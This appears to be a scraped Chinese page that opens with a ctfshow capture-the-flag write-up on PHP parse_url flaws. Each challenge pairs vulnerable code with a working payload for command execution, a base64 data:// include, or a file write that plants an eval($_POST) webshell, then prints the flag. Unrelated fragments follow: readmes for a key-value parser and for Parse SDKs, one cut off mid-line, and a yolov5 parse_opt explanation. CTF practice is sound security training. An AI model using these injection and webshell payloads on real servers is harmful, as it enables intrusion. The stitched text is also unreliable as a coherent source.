# @Date: 2023-05-10 09:52:06
# @Last Modified by: h1xa
# @Last Modified time: 2023-05-10 10:58:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
$data
=
parse_url
(
$_GET
[
'u'
]
)
;
eval
(
$data
[
'host'
]
)
;
Payload:?u=http://system('cd ..;cd ..;cd ..;cat flag_is_here.txt');
也可以通过
POST
去执行命令获取,得到
flag
在
flag_is_here.txt
下
cat
查看一下即可。
?u=http://eval($_POST[a]);
a=system("ls /");
ctfshow{a0e80fdb-2488-41ec-ab41-3f444485afb6}
> <?php
> # -*- coding: utf-8 -*-
> # @Author: h1xa
> # @Date: 2023-05-10 09:52:06
> # @Last Modified by: h1xa
> # @Last Modified time: 2023-05-12 13:25:53
> # @email: h1xa@ctfer.com
> # @link: https://ctfer.com
> $data = parse_url($_GET['u']);
> include $data['host'].$data['path'];
Payload:
?u=ctfshow://data:://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b
ctfshow{d855cf94-0ea0-4ae6-9983-25331dae4b3d}
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2023-05-10 09:52:06
# @Last Modified by: h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
$data = parse_url($_GET['u']);
include $data['scheme'].$data['path'];
Payload:
get:?u=data:://test/plain;base64,PD9waHAgc3lzdGVtKCRfUE9TVFtBXSk7Pz4=
post:A=tac /_f*
ctfshow{595cf0e0-350b-4a58-aa16-970b290fd1c9}
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2023-05-10 09:52:06
# @Last Modified by: h1xa
# @Last Modified time: 2023-05-12 13:29:35
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
$data = parse_url($_GET['u']);
system($data['host']);
Payload:?u=http://cd ..;cd ..;cd ..;tac 1_f1ag_1s*
ctfshow{644f5bb8-5572-4569-882d-1a5673e01f9b}
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2023-05-10 09:52:06
# @Last Modified by: h1xa
# @Last Modified time: 2023-05-12 13:29:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
extract(parse_url($_GET['u']));
include $$$$$$host;
Payload:
get:
?u=%75%73%65%72%3a%2f%2f%70%61%73%73%3a%71%75%65%72%79%40%73%63%68%65%6d%65%2f%3f%66%72%61%67%6d%65%6e%74%23%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%3b%62%61%73%65%36%34%2c%50%44%39%77%61%48%41%67%63%33%6c%7a%64%47%56%74%4b%43%52%66%55%45%39%54%56%46%74%42%58%53%6b%37%50%7a%34%3d
post:
A=tac /_f1a*
ctfshow{2c95c0cf-6c53-46ce-bd87-1221067bc07a}
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2023-05-10 09:52:06
# @Last Modified by: h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
$data = parse_url($_GET['u']);
file_put_contents($data['path'], $data['host']);
Payload:
get:
?u=http://111<script language="php">eval($_POST[A]);/var/www/html/zzz.php
post:
A=system("tac /_f1a*");
ctfshow{ba400845-b41f-4612-8f5a-30fa718db9a1}
至此本周的周末大挑战全部通过,感谢大家的观看和官网的wp不一样(当时做完了没有及时写 现在补完啦,又是充实的一天😊!)
yarn add parse-key-value-pair
const parseKeyValue = require ( 'parse-key-value-pair' )
const [ key , value ] = parseKeyValue ( 'NODE_ENV=production' )
parseKeyValuePair(input) => [key, value]
返回解析的键和值
parseKeyValuePair(input, { ignoreMalformed: true }) => [key, value] | null
返回已解析的键和值,对于格式错误的字符串(如"
这是一个示例应用程序,用于展示如何通过使用 gem将应用程序与后端集成。
确保您拥有方便使用的Parse-Server的API密钥。 首先,请克隆此存储库并运行bundle命令。
$ bundle install
编辑文件,以便使用您的Parse-Server API密钥对其进行配置。 您可以选择使用.env文件,该文件将被加载到ENV 。
# in .env
PARSE_SERVER_URL=https://api.parse.com/1
PARSE_APP_ID=<YOUR>
PARSE_API_KEY=<YOUR>
PARSE_MASTER_KEY=<YOUR>
模型生成器
我们在创建了一个样本Song and Artist模型。 要升级架构并创建这些新集合,请运行parse:upgrade
该库可让您从Android应用访问强大的Parse云平台。 有关Parse及其功能的更多信息,请,和。
将此添加到您的根build.gradle文件(而不是模块build.gradle文件)中:
allprojects {
repositories {
maven { url " https://jitpack.io " }
然后,将该库添加到您的项目build.gradle
ext {
parseVersion = " latest.version.here "
dependencies {
implementation " com.github.parse-community.Parse-SDK-Android:parse: $p arseVersion "
// for Google login/signup support (optional)
implementation " com.github.parse-community.Parse-SDK-Android:go
在yolov5-master中,parse_opt函数是一个用于解析命令行参数的函数。该函数使用了Python中的argparse模块,可以从命令行中读取参数并对其进行解析,从而帮助用户配置YOLOv5模型的训练和测试过程。
具体来说,parse_opt函数定义了一系列命令行参数,比如模型的名称、训练集和验证集的路径、学习率、batch size等。当用户输入命令行参数时,parse_opt函数将读取这些参数,并将它们存储在一个配置字典中,以便在后续的训练或测试过程中使用。
例如,当用户输入以下命令时:
python train.py --data coco.yaml --cfg yolov5s.yaml --weight '' --batch-size 64 --epochs 300 --name yolov5s_results
parse_opt函数将读取并解析这些参数,并将它们存储在一个名为opt的字典中,以便在训练过程中使用。
